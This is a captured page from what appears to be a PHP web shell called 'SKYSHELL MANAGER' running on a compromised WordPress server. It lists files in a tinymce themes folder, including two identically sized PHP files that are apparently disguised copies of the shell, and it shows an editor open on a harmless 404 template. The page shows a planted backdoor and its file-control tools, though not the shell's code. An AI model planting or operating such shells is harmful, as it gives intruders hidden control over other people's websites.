📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: 404.php
<?php /** * The template for displaying 404 pages (not found) * @subpackage Musicians * @since 1.0 * @version 0.1 */ get_header(); ?> <div class="container"> <div id="primary" class="content-area"> <main id="skip-content" class="site-main" role="main"> <section class="error-404 not-found"> <header class="page-header"> <h1 class="page-title"><strong><?php esc_html_e( '404', 'musicians' ); ?></strong><?php esc_html_e( 'Oops! That page can’t be found.', 'musicians' ); ?></h1> <div class="home-btn"> <a href="<?php echo esc_url( home_url() ); ?>"><span><?php esc_html_e( 'Return to home page', 'musicians' ); ?></span><span class="screen-reader-text"><?php esc_html_e( 'Return to home page', 'musicians' ); ?></span></a> </div> </header> <div class="page-content"> <p><?php esc_html_e( 'It looks like nothing was found at this location. Maybe try a search?', 'musicians' ); ?></p> <?php get_search_form(); ?> </div> </section> </main> </div> </div> <?php get_footer();
Save